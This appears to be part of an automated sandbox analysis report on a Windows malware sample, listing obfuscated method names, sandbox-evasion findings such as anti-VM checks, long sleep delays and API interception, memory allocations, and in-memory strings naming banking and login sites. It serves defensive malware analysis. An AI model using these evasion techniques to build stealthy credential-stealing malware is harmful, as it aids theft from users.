            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, bc8Uw5ftWUygwOd2hB.csHigh entropy of concatenated method names: 'XeGugm0gT1', 'lLhuKRAkxc', 'e58uy23GDM', 'C47uWsdjQ5', 'jsnujRw751', 'NWHupgHEmh', 'Ht3uYEXyYG', 'yujudWwqWp', 'A7euwER0Mn', 'op2u5HbAMQ'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, pgN0ik0xr8ZdYvmMlB.csHigh entropy of concatenated method names: 'LsQanhhR2', 'l8IbJk5Es', 'YrbJGX66K', 'ryJCipret', 'L19AtiD4O', 'z5nTcCpS9', 'Sq8pt8T6T2Q7AyTqpl', 'UvchEkiENYb7URxVs4', 'o99u3S3N6', 'EVeo6sVUm'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, vZA6ivT8rHvUbMkrFe.csHigh entropy of concatenated method names: 'jFAWOJgi1P', 'rb4WCv32AV', 'qVly6L9oKi', 'FKUylXfPH9', 'siOy9UiZmd', 'JDjySqWoIi', 'hxyymr2RVH', 'HSwyMwABGA', 'bZdyGPcyHK', 'mspyUpsrfg'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, zpnUutyO1DyuGC9q5s.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jU70RxsGr6', 'JMk0FH9vIp', 'kAP0z1Bbhs', 'TYntIlb6hC', 'QiptPeGmQN', 'I82t0DbBLk', 'PjXttcGIZP', 'NYqw032oTYOkrC3y4Ts'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, cV3u6S4Dgqd6WRDw3L.csHigh entropy of concatenated method names: 'LD6ZfdhYFc', 'o6lZF2oVeI', 'C8xuIHXQA4', 'tnOuPKVvab', 'Ef9Z1keglY', 'ifwZvDfWlP', 'cEfZBfjm8T', 'C0UZx8TQZt', 'RcPZ2iAtgF', 'PgUZNXwWJ6'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, P9LRnd8hBdq7ZDX3Nv.csHigh entropy of concatenated method names: 'UMBj7GaFBB', 'pVSjKuh2Bj', 'f9rjW9kwX2', 'Gj0jpsKPO3', 'fqVjYfNyBU', 'O4QWQRVshS', 'BnXW4epvuu', 'oauWXQIKRM', 'eLCWfRhYZs', 'HYMWRm9E5o'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, DloH6yB4mxp36pGqUr.csHigh entropy of concatenated method names: 'N12D3VqyAR', 'pUUDAEIntj', 'ihRD8ImQef', 'xVYDiQiy7s', 'F4fDlIIT5O', 'CN5D9EGbQQ', 'I83Dm5uwxH', 'm04DMlvmEq', 'lCUDUhhWRB', 'fxCD1G304G'
            Source: 0.2.CMV610942X6UI.exe.d150000.7.raw.unpack, LC84mQFdFur2ZUv2lS.csHigh entropy of concatenated method names: 'BOuEP8EQYO', 'eNeEt05trw', 'sd2EHWrZGI', 'LRLEgfu66q', 'OSbEKYnSuu', 'H2xEWo6cKi', 'GsZEj9McMD', 'GUfuXTdMvB', 'HXnufpMTUF', 'skauRHNtlE'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, mFb9wARwNwaJe5w7ZV.csHigh entropy of concatenated method names: 'zqCu8q5y6W', 'TULuiJGNsW', 'N08u67Rpjw', 'EcMullE9Vf', 'kJDux53Qo0', 'Tivu94lSr3', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, QZC8Vgm38RMQqTFC0I.csHigh entropy of concatenated method names: 'bhmpgxJDGX', 'Xh4pyFtcDj', 'y21pjWtxlD', 'HYojFb6fNN', 'WuxjzQLAnC', 'W0GpIYHvdA', 'g0lpPYtufT', 'IHgp04Ilk4', 'hKnptSWk86', 'NKipHVr3VA'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, wdwmQsS8tMhsauNIkb.csHigh entropy of concatenated method names: 'G95jNHp6AC', 'ba9jLHZdOE', 'oV2jQqAGbs', 'ToString', 'prxj42nL5m', 'UKijXPoV8I', 's6E13wHgNWLacbRiBMF', 'KW3pASHRAeoV0c7nTk7', 'LGZm2LHrwsAitZOuTHS'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, xx0KhNYstrI8TI7Bnr.csHigh entropy of concatenated method names: 'xl9t7BWZbQ', 'OCntg7F8PP', 'bCetKYilTO', 'moLtyXvmHq', 'ksJtWEvQn2', 'zW4tju3PFq', 'PGJtptW8lv', 'LyFtYN90u8', 'eYbtdeU5aG', 'xjxtwEepRp'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, QuvsOJLMp63DVZBfMB.csHigh entropy of concatenated method names: 'NwnZwpPMui', 'JTCZ5H8J82', 'ToString', 'sGQZgZFC1Y', 'pH2ZKAFd5S', 'UG5ZymWfps', 'sRuZWNZtMD', 'SpEZjExbm4', 'IfqZpJXPCI', 'CWcZYD0ned'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, tHT8CVGRGX12Uy9q6l.csHigh entropy of concatenated method names: 's09psEwZlS', 'URvphnah8v', 'SBkpaplUjE', 'e8ypbTCLkr', 'a8apO1cG7o', 'JZ4pJchb7m', 'tgHpCCnbwn', 'eI0p3aSH1T', 'Ve9pAwDOwS', 'HPypTbanWk'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, wjHVApHL5aYoBPGjHD.csHigh entropy of concatenated method names: 'fHePpqar9C', 'HDVPYsyoPk', 'lODPw5LB2H', 'ynwP5unZA6', 'LkrPkFev9L', 'XndPrhBdq7', 'gTXwBKelHZ2HvdsqKA', 'CKTjfYIo4ovXGutMZA', 'dvdPPNdl7Y', 'XnjPtsI8c3'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, bPa2QExW5ojMAKvEve.csHigh entropy of concatenated method names: 'e4tkUPc7hT', 'Wjekv9bNGd', 'SlEkxqIP9L', 'X3Ak2k0O5M', 'L2okijtBxa', 'Ei9k6jPSdW', 'FQAkl0h8lX', 'zSyk9bDerL', 'FP3kSE8uhR', 'zXUkmxgj1W'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, BxUmT6KabXkxnurDhm.csHigh entropy of concatenated method names: 'Dispose', 'd7PPRwZyDk', 'uGy0iZ0fmT', 'AhuUUYKuvY', 'qPcPF8Uw5t', 'hUyPzgwOd2', 'ProcessDialogKey', 'zBw0IFb9wA', 'lNw0PaJe5w', 'eZV00mC84m'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, qLhyZwAOD5LB2Hhnwu.csHigh entropy of concatenated method names: 'ujZybAxNEp', 'ma5yJ6WhjV', 'Gwmy3QPjpy', 'sxRyAoNsfY', 'jMTykZFWl9', 'sQKyr6yF4o', 'f4tyZM51d5', 'G0EyulQJnu', 'wX2yEh12jR', 'N9CyoGrih8'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, uqar9C3iDVsyoPkaSq.csHigh entropy of concatenated method names: 'viTKxn3xju', 'piHK2h12rx', 'MBIKN36Sfu', 'IY0KLthUvV', 'jDnKQ5AW0d', 'pmYK4ekwnT', 'qVEKXeakwi', 'Ry8KfNfZL6', 'Cp2KRIro1Z', 'DhFKFb160r'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, tojMPAPIFWIQ7h6ZKOd.csHigh entropy of concatenated method names: 'HZBEswU9aU', 'pvQEh3UPfc', 'oa2EamMZ1q', 'yn1EbOlt4r', 'DG8EOC9At4', 'rJlEJCMO22', 'uZ9ECYxPlL', 'bnbE3SnylG', 'miUEA5nO5B', 'yPaETdulDk'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, t5ATJRPtXI2sMd8MoI7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VINoxpC6CR', 'd49o29oiVL', 'SEPoNulq1G', 'zRUoLyMV35', 'IZIoQGuQmr', 'ueno4pKYtA', 'zYToX62Byx'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, bc8Uw5ftWUygwOd2hB.csHigh entropy of concatenated method names: 'XeGugm0gT1', 'lLhuKRAkxc', 'e58uy23GDM', 'C47uWsdjQ5', 'jsnujRw751', 'NWHupgHEmh', 'Ht3uYEXyYG', 'yujudWwqWp', 'A7euwER0Mn', 'op2u5HbAMQ'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, pgN0ik0xr8ZdYvmMlB.csHigh entropy of concatenated method names: 'LsQanhhR2', 'l8IbJk5Es', 'YrbJGX66K', 'ryJCipret', 'L19AtiD4O', 'z5nTcCpS9', 'Sq8pt8T6T2Q7AyTqpl', 'UvchEkiENYb7URxVs4', 'o99u3S3N6', 'EVeo6sVUm'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, vZA6ivT8rHvUbMkrFe.csHigh entropy of concatenated method names: 'jFAWOJgi1P', 'rb4WCv32AV', 'qVly6L9oKi', 'FKUylXfPH9', 'siOy9UiZmd', 'JDjySqWoIi', 'hxyymr2RVH', 'HSwyMwABGA', 'bZdyGPcyHK', 'mspyUpsrfg'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, zpnUutyO1DyuGC9q5s.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jU70RxsGr6', 'JMk0FH9vIp', 'kAP0z1Bbhs', 'TYntIlb6hC', 'QiptPeGmQN', 'I82t0DbBLk', 'PjXttcGIZP', 'NYqw032oTYOkrC3y4Ts'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, cV3u6S4Dgqd6WRDw3L.csHigh entropy of concatenated method names: 'LD6ZfdhYFc', 'o6lZF2oVeI', 'C8xuIHXQA4', 'tnOuPKVvab', 'Ef9Z1keglY', 'ifwZvDfWlP', 'cEfZBfjm8T', 'C0UZx8TQZt', 'RcPZ2iAtgF', 'PgUZNXwWJ6'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, P9LRnd8hBdq7ZDX3Nv.csHigh entropy of concatenated method names: 'UMBj7GaFBB', 'pVSjKuh2Bj', 'f9rjW9kwX2', 'Gj0jpsKPO3', 'fqVjYfNyBU', 'O4QWQRVshS', 'BnXW4epvuu', 'oauWXQIKRM', 'eLCWfRhYZs', 'HYMWRm9E5o'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, DloH6yB4mxp36pGqUr.csHigh entropy of concatenated method names: 'N12D3VqyAR', 'pUUDAEIntj', 'ihRD8ImQef', 'xVYDiQiy7s', 'F4fDlIIT5O', 'CN5D9EGbQQ', 'I83Dm5uwxH', 'm04DMlvmEq', 'lCUDUhhWRB', 'fxCD1G304G'
            Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, LC84mQFdFur2ZUv2lS.csHigh entropy of concatenated method names: 'BOuEP8EQYO', 'eNeEt05trw', 'sd2EHWrZGI', 'LRLEgfu66q', 'OSbEKYnSuu', 'H2xEWo6cKi', 'GsZEj9McMD', 'GUfuXTdMvB', 'HXnufpMTUF', 'skauRHNtlE'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, mFb9wARwNwaJe5w7ZV.csHigh entropy of concatenated method names: 'zqCu8q5y6W', 'TULuiJGNsW', 'N08u67Rpjw', 'EcMullE9Vf', 'kJDux53Qo0', 'Tivu94lSr3', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, QZC8Vgm38RMQqTFC0I.csHigh entropy of concatenated method names: 'bhmpgxJDGX', 'Xh4pyFtcDj', 'y21pjWtxlD', 'HYojFb6fNN', 'WuxjzQLAnC', 'W0GpIYHvdA', 'g0lpPYtufT', 'IHgp04Ilk4', 'hKnptSWk86', 'NKipHVr3VA'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, wdwmQsS8tMhsauNIkb.csHigh entropy of concatenated method names: 'G95jNHp6AC', 'ba9jLHZdOE', 'oV2jQqAGbs', 'ToString', 'prxj42nL5m', 'UKijXPoV8I', 's6E13wHgNWLacbRiBMF', 'KW3pASHRAeoV0c7nTk7', 'LGZm2LHrwsAitZOuTHS'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, xx0KhNYstrI8TI7Bnr.csHigh entropy of concatenated method names: 'xl9t7BWZbQ', 'OCntg7F8PP', 'bCetKYilTO', 'moLtyXvmHq', 'ksJtWEvQn2', 'zW4tju3PFq', 'PGJtptW8lv', 'LyFtYN90u8', 'eYbtdeU5aG', 'xjxtwEepRp'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, QuvsOJLMp63DVZBfMB.csHigh entropy of concatenated method names: 'NwnZwpPMui', 'JTCZ5H8J82', 'ToString', 'sGQZgZFC1Y', 'pH2ZKAFd5S', 'UG5ZymWfps', 'sRuZWNZtMD', 'SpEZjExbm4', 'IfqZpJXPCI', 'CWcZYD0ned'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, tHT8CVGRGX12Uy9q6l.csHigh entropy of concatenated method names: 's09psEwZlS', 'URvphnah8v', 'SBkpaplUjE', 'e8ypbTCLkr', 'a8apO1cG7o', 'JZ4pJchb7m', 'tgHpCCnbwn', 'eI0p3aSH1T', 'Ve9pAwDOwS', 'HPypTbanWk'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, wjHVApHL5aYoBPGjHD.csHigh entropy of concatenated method names: 'fHePpqar9C', 'HDVPYsyoPk', 'lODPw5LB2H', 'ynwP5unZA6', 'LkrPkFev9L', 'XndPrhBdq7', 'gTXwBKelHZ2HvdsqKA', 'CKTjfYIo4ovXGutMZA', 'dvdPPNdl7Y', 'XnjPtsI8c3'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, bPa2QExW5ojMAKvEve.csHigh entropy of concatenated method names: 'e4tkUPc7hT', 'Wjekv9bNGd', 'SlEkxqIP9L', 'X3Ak2k0O5M', 'L2okijtBxa', 'Ei9k6jPSdW', 'FQAkl0h8lX', 'zSyk9bDerL', 'FP3kSE8uhR', 'zXUkmxgj1W'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, BxUmT6KabXkxnurDhm.csHigh entropy of concatenated method names: 'Dispose', 'd7PPRwZyDk', 'uGy0iZ0fmT', 'AhuUUYKuvY', 'qPcPF8Uw5t', 'hUyPzgwOd2', 'ProcessDialogKey', 'zBw0IFb9wA', 'lNw0PaJe5w', 'eZV00mC84m'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, qLhyZwAOD5LB2Hhnwu.csHigh entropy of concatenated method names: 'ujZybAxNEp', 'ma5yJ6WhjV', 'Gwmy3QPjpy', 'sxRyAoNsfY', 'jMTykZFWl9', 'sQKyr6yF4o', 'f4tyZM51d5', 'G0EyulQJnu', 'wX2yEh12jR', 'N9CyoGrih8'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, uqar9C3iDVsyoPkaSq.csHigh entropy of concatenated method names: 'viTKxn3xju', 'piHK2h12rx', 'MBIKN36Sfu', 'IY0KLthUvV', 'jDnKQ5AW0d', 'pmYK4ekwnT', 'qVEKXeakwi', 'Ry8KfNfZL6', 'Cp2KRIro1Z', 'DhFKFb160r'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, tojMPAPIFWIQ7h6ZKOd.csHigh entropy of concatenated method names: 'HZBEswU9aU', 'pvQEh3UPfc', 'oa2EamMZ1q', 'yn1EbOlt4r', 'DG8EOC9At4', 'rJlEJCMO22', 'uZ9ECYxPlL', 'bnbE3SnylG', 'miUEA5nO5B', 'yPaETdulDk'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, t5ATJRPtXI2sMd8MoI7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VINoxpC6CR', 'd49o29oiVL', 'SEPoNulq1G', 'zRUoLyMV35', 'IZIoQGuQmr', 'ueno4pKYtA', 'zYToX62Byx'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, bc8Uw5ftWUygwOd2hB.csHigh entropy of concatenated method names: 'XeGugm0gT1', 'lLhuKRAkxc', 'e58uy23GDM', 'C47uWsdjQ5', 'jsnujRw751', 'NWHupgHEmh', 'Ht3uYEXyYG', 'yujudWwqWp', 'A7euwER0Mn', 'op2u5HbAMQ'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, pgN0ik0xr8ZdYvmMlB.csHigh entropy of concatenated method names: 'LsQanhhR2', 'l8IbJk5Es', 'YrbJGX66K', 'ryJCipret', 'L19AtiD4O', 'z5nTcCpS9', 'Sq8pt8T6T2Q7AyTqpl', 'UvchEkiENYb7URxVs4', 'o99u3S3N6', 'EVeo6sVUm'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, vZA6ivT8rHvUbMkrFe.csHigh entropy of concatenated method names: 'jFAWOJgi1P', 'rb4WCv32AV', 'qVly6L9oKi', 'FKUylXfPH9', 'siOy9UiZmd', 'JDjySqWoIi', 'hxyymr2RVH', 'HSwyMwABGA', 'bZdyGPcyHK', 'mspyUpsrfg'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, zpnUutyO1DyuGC9q5s.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jU70RxsGr6', 'JMk0FH9vIp', 'kAP0z1Bbhs', 'TYntIlb6hC', 'QiptPeGmQN', 'I82t0DbBLk', 'PjXttcGIZP', 'NYqw032oTYOkrC3y4Ts'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, cV3u6S4Dgqd6WRDw3L.csHigh entropy of concatenated method names: 'LD6ZfdhYFc', 'o6lZF2oVeI', 'C8xuIHXQA4', 'tnOuPKVvab', 'Ef9Z1keglY', 'ifwZvDfWlP', 'cEfZBfjm8T', 'C0UZx8TQZt', 'RcPZ2iAtgF', 'PgUZNXwWJ6'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, P9LRnd8hBdq7ZDX3Nv.csHigh entropy of concatenated method names: 'UMBj7GaFBB', 'pVSjKuh2Bj', 'f9rjW9kwX2', 'Gj0jpsKPO3', 'fqVjYfNyBU', 'O4QWQRVshS', 'BnXW4epvuu', 'oauWXQIKRM', 'eLCWfRhYZs', 'HYMWRm9E5o'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, DloH6yB4mxp36pGqUr.csHigh entropy of concatenated method names: 'N12D3VqyAR', 'pUUDAEIntj', 'ihRD8ImQef', 'xVYDiQiy7s', 'F4fDlIIT5O', 'CN5D9EGbQQ', 'I83Dm5uwxH', 'm04DMlvmEq', 'lCUDUhhWRB', 'fxCD1G304G'
            Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, LC84mQFdFur2ZUv2lS.csHigh entropy of concatenated method names: 'BOuEP8EQYO', 'eNeEt05trw', 'sd2EHWrZGI', 'LRLEgfu66q', 'OSbEKYnSuu', 'H2xEWo6cKi', 'GsZEj9McMD', 'GUfuXTdMvB', 'HXnufpMTUF', 'skauRHNtlE'
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: CMV610942X6UI.exe PID: 7812, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
            Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory allocated: C50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory allocated: 29E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory allocated: 27B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory allocated: 7B60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory allocated: 7010000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory allocated: 8B60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory allocated: 9B60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory allocated: 9ED0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory allocated: AED0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory allocated: BED0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory allocated: D220000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory allocated: E220000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory allocated: F220000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeMemory allocated: F900000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB096E rdtsc 3_2_00FB096E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\systray.exeWindow / User API: threadDelayed 9844Jump to behavior
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\systray.exeAPI coverage: 2.5 %
            Source: C:\Users\user\Desktop\CMV610942X6UI.exe TID: 7832Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\systray.exe TID: 5364Thread sleep count: 128 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\systray.exe TID: 5364Thread sleep time: -256000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\systray.exe TID: 5364Thread sleep count: 9844 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\systray.exe TID: 5364Thread sleep time: -19688000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe TID: 4868Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe TID: 4868Thread sleep time: -34500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0324B7F0 FindFirstFileW,FindNextFileW,FindClose,8_2_0324B7F0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 382-I9W6.8.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: 382-I9W6.8.drBinary or memory string: discord.comVMware20,11696494690f
            Source: 382-I9W6.8.drBinary or memory string: AMC password management pageVMware20,11696494690
            Source: 382-I9W6.8.drBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: 382-I9W6.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: 382-I9W6.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: 382-I9W6.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: 382-I9W6.8.drBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: 382-I9W6.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: 382-I9W6.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
